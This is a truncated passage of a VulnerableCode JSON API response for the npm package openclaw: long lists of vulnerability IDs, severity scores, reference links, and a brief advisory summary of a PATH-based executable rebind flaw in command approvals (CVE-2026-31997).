nbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-aawy-8xg4-1uen"},{"vulnerability":"VCID-ad1h-m5fz-f3hu"},{"vulnerability":"VCID-afkf-r949-dkgu"},{"vulnerability":"VCID-aja9-wzp2-kbcj"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-asuy-amja-eyd4"},{"vulnerability":"VCID-atn7-pn13-3fgb"},{"vulnerability":"VCID-axp9-mt9z-gkgw"},{"vulnerability":"VCID-aye6-1fwu-nkc5"},{"vulnerability":"VCID-b7hq-mrhg-b3bk"},{"vulnerability":"VCID-b9w3-w2nq-cqg6"},{"vulnerability":"VCID-bg1d-gmxy-wkc6"},{"vulnerability":"VCID-bgwh-spue-yybk"},{"vulnerability":"VCID-bk76-1ctt-tkaw"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-bnfh-rsk9-cfea"},{"vulnerability":"VCID-brfj-4shr-qkgc"},{"vulnerability":"VCID-bumq-54sb-6ua7"},{"vulnerability":"VCID-bzw7-yvu2-yqa2"},{"vulnerabilit
y":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-c4yt-z48z-zygv"},{"vulnerability":"VCID-c76v-4577-n7c6"},{"vulnerability":"VCID-carm-gpgh-wbbf"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-cjjd-hv92-wbfn"},{"vulnerability":"VCID-csnc-r6fv-j3en"},{"vulnerability":"VCID-cvmw-sxfq-dyhz"},{"vulnerability":"VCID-cvxu-rdbu-abd2"},{"vulnerability":"VCID-cwd3-ecym-sfaw"},{"vulnerability":"VCID-cyj6-zyuh-qug6"},{"vulnerability":"VCID-d3qp-5wm9-aqfp"},{"vulnerability":"VCID-d864-qy75-c3dx"},{"vulnerability":"VCID-d8v2-gft5-buee"},{"vulnerability":"VCID-da47-zdf1-mfgf"},{"vulnerability":"VCID-dbcw-brhj-k7hs"},{"vulnerability":"VCID-ddf9-tnrt-r7f2"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-djqx-bwuu-4uc1"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dsvn-dpb5-tfdz"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-dzmz-c5en-5qeq"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e31s-2etq-6fdq"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-eaaf-8rfa-f3hz"},{"vulnerability":"VCID-ebwd-3xp4-7fdp"},{"vulnerability":"VCID-eda1-pnhb-bqes"},{"vulnerability":"VCID-edn6-zer1-cya4"},{"vulnerability":"VCID-em6w-a7mj-mqa4"},{"vulnerability":"VCID-ewa7-qswv-tqet"},{"vulnerability":"VCID-fekn-d6f3-xfa6"},{"vulnerability":"VCID-fjfw-xwxw-u3at"},{"vulnerability":"VCID-ftdn-9fum-cbe4"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-g3hg-peh1-tudm"},{"vulnerability":"VCID-g8r6-x6s5-uydq"},{"vulnerability":"VCID-g9jn-c2rf-byem"},{"vulnerability":"VCID-gj27-bfws-uyfp"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-gncw-wfqt-9yek"},{"vulnerability":"VCID-gv2d-gfs7-gfh1"},{"vulnerability":"VCID-gvam-2net-8kc5"},{"vulnerability":"VCID-h3yu-7bfc-vqhz"},{"vulnerability":"VCID-h4av-vgqn-aqcn"},{"vulnerability":"VCID-h8vg-ewrr-tfec"},{"vulnerability":"VCID-h9g5-xe4k-6udx"},{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerabilit
y":"VCID-hd4w-s3dp-nubj"},{"vulnerability":"VCID-hkqd-6khg-m3hj"},{"vulnerability":"VCID-hse8-g1e9-dbay"},{"vulnerability":"VCID-hynd-965v-n3aq"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-hzbt-fbgp-h7fd"},{"vulnerability":"VCID-j6nj-gf5b-1khk"},{"vulnerability":"VCID-j8fb-fhyc-33fu"},{"vulnerability":"VCID-j92n-5217-9bhj"},{"vulnerability":"VCID-j96c-kau3-7fag"},{"vulnerability":"VCID-jad8-5duz-dqg1"},{"vulnerability":"VCID-jbwa-scg3-efeq"},{"vulnerability":"VCID-jdqk-kv8u-xqa9"},{"vulnerability":"VCID-jhah-j2td-t3dp"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-jtjv-j6yj-93et"},{"vulnerability":"VCID-jtxm-z4vv-cqg7"},{"vulnerability":"VCID-k3up-1vdf-2uh9"},{"vulnerability":"VCID-k52b-966p-ybbk"},{"vulnerability":"VCID-k5da-7tht-w3bs"},{"vulnerability":"VCID-k7fe-dqzc-kbcm"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcba-tshp-77d6"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kh1q-871c-zkfa"},{"vulnerability":"VCID-kh5u-hg46-3qha"},{"vulnerability":"VCID-kp3a-gr66-zkam"},{"vulnerability":"VCID-kthe-sgfb-kkb2"},{"vulnerability":"VCID-kzgh-7f6h-kfd1"},{"vulnerability":"VCID-m46m-y19r-2kd2"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mcz5-wgu1-z7g7"},{"vulnerability":"VCID-mggy-bv5s-5uax"},{"vulnerability":"VCID-mkka-hf2q-pfhp"},{"vulnerability":"VCID-mqzw-sq85-9ba2"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nf6w-v1pc-mbe5"},{"vulnerability":"VCID-nfva-pukn-uqch"},{"vulnerability":"VCID-njsr-j7vm-cqg8"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-nszj-2u6y-xqcb"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-nzu6-7a1g-4kf2"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p7me-4bzz-83cm"},{"vulnerabilit
y":"VCID-p7v5-jqhq-nbhz"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-p984-bgmq-zqc9"},{"vulnerability":"VCID-pa1f-qzsh-efa9"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pc9z-x5wk-8ue7"},{"vulnerability":"VCID-pdgz-5fu2-g7af"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-pgdr-mvc3-2kg3"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-q38j-b9g9-8yar"},{"vulnerability":"VCID-q6ne-sw1r-xkd1"},{"vulnerability":"VCID-q9jf-srt4-fbcg"},{"vulnerability":"VCID-qahm-7zt5-fqcg"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-qhr2-jktm-uycx"},{"vulnerability":"VCID-qjss-tvgk-3ubk"},{"vulnerability":"VCID-qjvc-etb4-qbfv"},{"vulnerability":"VCID-qquc-rw1d-m7ec"},{"vulnerability":"VCID-qr66-xgea-tufh"},{"vulnerability":"VCID-qyyn-bw9t-r7c4"},{"vulnerability":"VCID-r5bw-c2py-9udf"},{"vulnerability":"VCID-r5dj-qv5d-sqff"},{"vulnerability":"VCID-r9j7-ya3h-cbda"},{"vulnerability":"VCID-r9y1-z2ax-z3e2"},{"vulnerability":"VCID-rf6b-q7cj-jbgc"},{"vulnerability":"VCID-rkx2-eq2x-q7d1"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-rswr-nd6z-vuhe"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-s3wz-3yzf-ybhz"},{"vulnerability":"VCID-s4s8-8qea-q3fd"},{"vulnerability":"VCID-sddn-scg8-kqab"},{"vulnerability":"VCID-sh4x-nq7t-ykgg"},{"vulnerability":"VCID-sj4d-eenz-zqet"},{"vulnerability":"VCID-sja9-6t41-hud8"},{"vulnerability":"VCID-sw3m-5ryw-jbdh"},{"vulnerability":"VCID-swjf-k83n-h7gf"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-t8e5-163r-37hc"},{"vulnerability":"VCID-t991-75e7-ykdv"},{"vulnerability":"VCID-tdjc-vav8-97cf"},{"vulnerability":"VCID-te8f-snty-j7hh"},{"vulnerability":"VCID-tf28-1z2z-5yfn"},{"vulnerability":"VCID-tk9h-nqrz-uugp"},{"vulnerability":"VCID-tkxh-m458-6ydw"},{"vulnerability":"VCID-tqzy-84fm-z7b6"},{"vulnerability":"VCID-tu4b-f885-eyds"},{"vulnerability":"VCID-twsq-vfde-4fbf"},{"vulnerabilit
y":"VCID-u1ru-vdfp-x3hu"},{"vulnerability":"VCID-u6hw-ffpj-4yd9"},{"vulnerability":"VCID-u9cw-crg5-1kbs"},{"vulnerability":"VCID-u9ja-dgsh-yug2"},{"vulnerability":"VCID-una1-gxkk-t3bp"},{"vulnerability":"VCID-uy97-p1ex-y7df"},{"vulnerability":"VCID-v1bp-hw9a-yffz"},{"vulnerability":"VCID-v91b-1nmx-ckcx"},{"vulnerability":"VCID-v9cd-65tf-p3f8"},{"vulnerability":"VCID-vktg-77tu-vycv"},{"vulnerability":"VCID-vm8g-hrvu-quhm"},{"vulnerability":"VCID-vqrj-z6tx-rff2"},{"vulnerability":"VCID-vtqt-bgz7-yub6"},{"vulnerability":"VCID-vx5d-3d98-7kf3"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2rd-2j4p-gfgw"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-w58d-6veg-uugy"},{"vulnerability":"VCID-w8sb-7ymy-wkez"},{"vulnerability":"VCID-watb-49vx-yub1"},{"vulnerability":"VCID-wfkm-7ayk-uuhb"},{"vulnerability":"VCID-wfsp-szhr-r7eu"},{"vulnerability":"VCID-wkye-je9r-1fba"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-wut7-y72y-9ucb"},{"vulnerability":"VCID-wwcu-de9t-d3ca"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-x4hn-ygbg-mkep"},{"vulnerability":"VCID-x794-wfnf-1ugf"},{"vulnerability":"VCID-x7uw-s9a6-fybd"},{"vulnerability":"VCID-x9qg-8qk5-s3d6"},{"vulnerability":"VCID-xdr6-tfsy-rqeu"},{"vulnerability":"VCID-xfgw-ua7r-abbr"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xpnh-32hh-p7fb"},{"vulnerability":"VCID-xpr3-hg3h-z3bz"},{"vulnerability":"VCID-xryt-a83q-q7et"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-xux6-be95-e7ec"},{"vulnerability":"VCID-xvhd-w4tv-tqhr"},{"vulnerability":"VCID-xyck-sspa-4ba2"},{"vulnerability":"VCID-xz8s-hj5s-wfgj"},{"vulnerability":"VCID-xzg5-ren5-p7gw"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-y7sd-j9xn-qffs"},{"vulnerability":"VCID-y8jc-h9ft-auge"},{"vulnerabilit
y":"VCID-ycse-95bv-7ua9"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ykwt-tdpa-3bft"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-ynup-4v9e-tbh4"},{"vulnerability":"VCID-yp2w-pc58-9bf6"},{"vulnerability":"VCID-ywrn-52gx-f3ad"},{"vulnerability":"VCID-z3rc-xpx7-fkcu"},{"vulnerability":"VCID-z7wa-tw2t-vqas"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-z8sm-pm9t-wyhu"},{"vulnerability":"VCID-z9a2-t66z-buga"},{"vulnerability":"VCID-zac2-wjyt-27af"},{"vulnerability":"VCID-zb5t-hhkm-kfeh"},{"vulnerability":"VCID-zda4-uuw4-fkhp"},{"vulnerability":"VCID-zf3q-78js-k7ce"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zhpy-h2b2-ekd8"},{"vulnerability":"VCID-zkum-rn42-yyfs"},{"vulnerability":"VCID-zpb1-e3g9-vkbh"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"},{"vulnerability":"VCID-zwzb-t4a7-tff8"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.1"}],"aliases":["GHSA-jr6x-2q95-fh2g"],"risk_score":4.0,"exploitability":"0.5","weighted_severity":"8.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-nxnv-bqua-gkcb"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/50478?format=json","vulnerability_id":"VCID-pcea-jxne-vygc","summary":"OpenClaw: system.run approvals did not bind PATH-token executable identity, enabling post-approval executable rebind\nFor `host=node` runs, approvals validated command context but did not pin executable identity for non-path-like `argv[0]` tokens (for example `tr`). 
If PATH resolution changed after approval, execution could run a different binary.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-31997","reference_id":"","reference_type":"","scores":[{"value":"9e-05","scoring_system":"epss","scoring_elements":"0.01084","published_at":"2026-06-07T12:55:00Z"},{"value":"9e-05","scoring_system":"epss","scoring_elements":"0.01085","published_at":"2026-06-06T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-31997"},{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"8.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-executable-rebind-via-unbound-path-token-in-system-run-approvals","reference_id":"","reference_type":"","scores":[{"value":"6","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:H/PR:L/UI:R/S:U/C:H/I:H/A:N"},{"value":"4.4","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:H/AT:N/PR:L/UI:A/VC:N/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"8.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-03-19T14:05:09Z/"}],"url":"https://www.vulncheck.com/advisories/openclaw-executable-rebind-via-unbound-path-token-in-system-run-approvals"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-31997","reference_id":"CVE-2026-31997","reference_type":"","scores":[{"value":"8.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"ge
neric_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-31997"},{"reference_url":"https://github.com/advisories/GHSA-q399-23r3-hfx4","reference_id":"GHSA-q399-23r3-hfx4","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-q399-23r3-hfx4"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-q399-23r3-hfx4","reference_id":"GHSA-q399-23r3-hfx4","reference_type":"","scores":[{"value":"6","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:H/PR:L/UI:R/S:U/C:H/I:H/A:N"},{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"4.4","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:H/AT:N/PR:L/UI:A/VC:N/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"8.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-03-19T14:05:09Z/"}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-q399-23r3-hfx4"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/74372?format=json","purl":"pkg:npm/openclaw@2026.3.1","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-11dg-bvft-6kb1"},{"vulnerability":"VCID-1728-wc17-dud6"},{"vulnerability":"VCID-1j3m-fecr-f7cn"},{"vulnerability":"VCID-1kk2-t48u-zkb2"},{"vulnerability":"VCID-1p3b-pfnn-x7ad"},{"vulnerability":"VCID-1p5p-eth5-3ufu"},{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-1smq-mbty-jkaj"},{"vulnerability":"VCID-1ufd-uuqk-nbdv"},{"vulnerability":"VCID-1y7e-y41k-qyfc"},{"vulnerability":"VCID-21eb-723m-xkfu"},{"vulnerability":"VCID-24eb-5jt8-aueq"},{"vulnerability":"VCID-24m7-jx1g-hqde"},{"vulnerability":"VCID-258k-a4dw-tfae"},{"vulnerability":"VCID-
26kp-dbu2-pqej"},{"vulnerability":"VCID-26sg-e29u-hkf3"},{"vulnerability":"VCID-26sv-grsd-abcw"},{"vulnerability":"VCID-2927-2whr-sudd"},{"vulnerability":"VCID-294z-6z8j-97bx"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2hca-3v8f-f3e8"},{"vulnerability":"VCID-2jsx-pvnr-6ydn"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-2uqu-k42d-1baq"},{"vulnerability":"VCID-2v8n-mnws-jfc9"},{"vulnerability":"VCID-2wr9-h42m-a7ev"},{"vulnerability":"VCID-32zs-2zs9-uufs"},{"vulnerability":"VCID-34hg-6fw2-wfax"},{"vulnerability":"VCID-356u-h788-pkgt"},{"vulnerability":"VCID-37ep-9smd-zuh9"},{"vulnerability":"VCID-384t-z1h8-pfft"},{"vulnerability":"VCID-38g8-39ek-xbat"},{"vulnerability":"VCID-3bdd-a9nw-13bn"},{"vulnerability":"VCID-3pqp-bneb-mbc4"},{"vulnerability":"VCID-3qbe-dsde-p7dz"},{"vulnerability":"VCID-3wsw-d4z2-dydt"},{"vulnerability":"VCID-3xeb-phgc-vkcg"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-3zx4-t8cj-kbfn"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-44hp-3xh1-uyen"},{"vulnerability":"VCID-49b4-qwz6-q7he"},{"vulnerability":"VCID-4hcw-cv74-zkah"},{"vulnerability":"VCID-4hz5-f2pw-3yb4"},{"vulnerability":"VCID-4jwj-6s5z-wbeq"},{"vulnerability":"VCID-4nwq-14y4-xkhp"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4uqc-3h1c-4yhs"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-5atj-2a7b-57g5"},{"vulnerability":"VCID-5rgx-2krs-guck"},{"vulnerability":"VCID-5s6h-u8x6-myfk"},{"vulnerability":"VCID-5u41-c7kc-u7fe"},{"vulnerability":"VCID-6849-th74-yqd5"},{"vulnerability":"VCID-6bxd-kbse-sudx"},{"vulnerability":"VCID-6rha-8r5p-jyb7"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-733f-57ds-xugm"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-
74bc-hfqh-cbcd"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7dyw-9b37-yqh4"},{"vulnerability":"VCID-7gju-19nh-7bgu"},{"vulnerability":"VCID-7ntr-5dr5-9uf8"},{"vulnerability":"VCID-7pqs-17nm-duf1"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-7wmr-v7zb-6fc9"},{"vulnerability":"VCID-7z2s-k6ty-ekg1"},{"vulnerability":"VCID-816s-45wb-83ce"},{"vulnerability":"VCID-849r-t5j1-vue8"},{"vulnerability":"VCID-84fd-3yvx-rfgq"},{"vulnerability":"VCID-84v2-s1yq-rkfr"},{"vulnerability":"VCID-8aek-6dw1-tudj"},{"vulnerability":"VCID-8u6d-ekbs-afgd"},{"vulnerability":"VCID-8uzb-xmf8-hbca"},{"vulnerability":"VCID-8v2w-jgh7-6ybq"},{"vulnerability":"VCID-8z7r-a8dv-eueb"},{"vulnerability":"VCID-96jd-x87b-s3ey"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9jjv-aa8k-rke1"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9pj9-7b12-jbea"},{"vulnerability":"VCID-9uyu-y9qv-u7e1"},{"vulnerability":"VCID-9v6f-dbmk-jygq"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-9xrt-mv81-3yc8"},{"vulnerability":"VCID-a2p8-ydn6-3bbr"},{"vulnerability":"VCID-a2t8-px5b-nfgd"},{"vulnerability":"VCID-a2wx-7b8h-c3h1"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-aawy-8xg4-1uen"},{"vulnerability":"VCID-ad1h-m5fz-f3hu"},{"vulnerability":"VCID-afkf-r949-dkgu"},{"vulnerability":"VCID-aja9-wzp2-kbcj"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-asuy-amja-eyd4"},{"vulnerability":"VCID-atn7-pn13-3fgb"},{"vulnerability":"VCID-axp9-mt9z-gkgw"},{"vulnerability":"VCID-aye6-1fwu-nkc5"},{"vulnerability":"VCID-b7hq-mrhg-b3bk"},{"vulnerability":"VCID-b9w3-w2nq-cqg6"},{"vulnerability":"VCID-bg1d-gmxy-wkc6"},{"vulnerability":"VCID-bgwh-spue-yybk"},{"vulnerability":"VCID-bk76-1ctt-tkaw"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-bnfh-rsk9-cfea"},{"vulnerability":"VCID-brfj-4shr-qkgc"},{"vulnerability":"VCID-
bumq-54sb-6ua7"},{"vulnerability":"VCID-bzw7-yvu2-yqa2"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-c4yt-z48z-zygv"},{"vulnerability":"VCID-c76v-4577-n7c6"},{"vulnerability":"VCID-carm-gpgh-wbbf"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-cjjd-hv92-wbfn"},{"vulnerability":"VCID-csnc-r6fv-j3en"},{"vulnerability":"VCID-cvmw-sxfq-dyhz"},{"vulnerability":"VCID-cvxu-rdbu-abd2"},{"vulnerability":"VCID-cwd3-ecym-sfaw"},{"vulnerability":"VCID-cyj6-zyuh-qug6"},{"vulnerability":"VCID-d3qp-5wm9-aqfp"},{"vulnerability":"VCID-d864-qy75-c3dx"},{"vulnerability":"VCID-d8v2-gft5-buee"},{"vulnerability":"VCID-da47-zdf1-mfgf"},{"vulnerability":"VCID-dbcw-brhj-k7hs"},{"vulnerability":"VCID-ddf9-tnrt-r7f2"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-djqx-bwuu-4uc1"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dsvn-dpb5-tfdz"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-dzmz-c5en-5qeq"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e31s-2etq-6fdq"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-eaaf-8rfa-f3hz"},{"vulnerability":"VCID-ebwd-3xp4-7fdp"},{"vulnerability":"VCID-eda1-pnhb-bqes"},{"vulnerability":"VCID-edn6-zer1-cya4"},{"vulnerability":"VCID-em6w-a7mj-mqa4"},{"vulnerability":"VCID-ewa7-qswv-tqet"},{"vulnerability":"VCID-fekn-d6f3-xfa6"},{"vulnerability":"VCID-fjfw-xwxw-u3at"},{"vulnerability":"VCID-ftdn-9fum-cbe4"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-g3hg-peh1-tudm"},{"vulnerability":"VCID-g8r6-x6s5-uydq"},{"vulnerability":"VCID-g9jn-c2rf-byem"},{"vulnerability":"VCID-gj27-bfws-uyfp"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-gncw-wfqt-9yek"},{"vulnerability":"VCID-gv2d-gfs7-gfh1"},{"vulnerability":"VCID-gvam-2net-8kc5"},{"vulnerability":"VCID-h3yu-7bfc-vqhz"},{"vulnerability":"VCID-h4av-vgqn-aqcn"},{"vulnerability":"VCID-h8vg-ewrr-tfec"},{"vulnerability":"VCID-
h9g5-xe4k-6udx"},{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hd4w-s3dp-nubj"},{"vulnerability":"VCID-hkqd-6khg-m3hj"},{"vulnerability":"VCID-hse8-g1e9-dbay"},{"vulnerability":"VCID-hynd-965v-n3aq"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-hzbt-fbgp-h7fd"},{"vulnerability":"VCID-j6nj-gf5b-1khk"},{"vulnerability":"VCID-j8fb-fhyc-33fu"},{"vulnerability":"VCID-j92n-5217-9bhj"},{"vulnerability":"VCID-j96c-kau3-7fag"},{"vulnerability":"VCID-jad8-5duz-dqg1"},{"vulnerability":"VCID-jbwa-scg3-efeq"},{"vulnerability":"VCID-jdqk-kv8u-xqa9"},{"vulnerability":"VCID-jhah-j2td-t3dp"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-jtjv-j6yj-93et"},{"vulnerability":"VCID-jtxm-z4vv-cqg7"},{"vulnerability":"VCID-k3up-1vdf-2uh9"},{"vulnerability":"VCID-k52b-966p-ybbk"},{"vulnerability":"VCID-k5da-7tht-w3bs"},{"vulnerability":"VCID-k7fe-dqzc-kbcm"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcba-tshp-77d6"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kh1q-871c-zkfa"},{"vulnerability":"VCID-kh5u-hg46-3qha"},{"vulnerability":"VCID-kp3a-gr66-zkam"},{"vulnerability":"VCID-kthe-sgfb-kkb2"},{"vulnerability":"VCID-kzgh-7f6h-kfd1"},{"vulnerability":"VCID-m46m-y19r-2kd2"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mcz5-wgu1-z7g7"},{"vulnerability":"VCID-mggy-bv5s-5uax"},{"vulnerability":"VCID-mkka-hf2q-pfhp"},{"vulnerability":"VCID-mqzw-sq85-9ba2"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nf6w-v1pc-mbe5"},{"vulnerability":"VCID-nfva-pukn-uqch"},{"vulnerability":"VCID-njsr-j7vm-cqg8"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-nszj-2u6y-xqcb"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-nzu6-7a1g-4kf2"},{"vulnerability":"VCID-
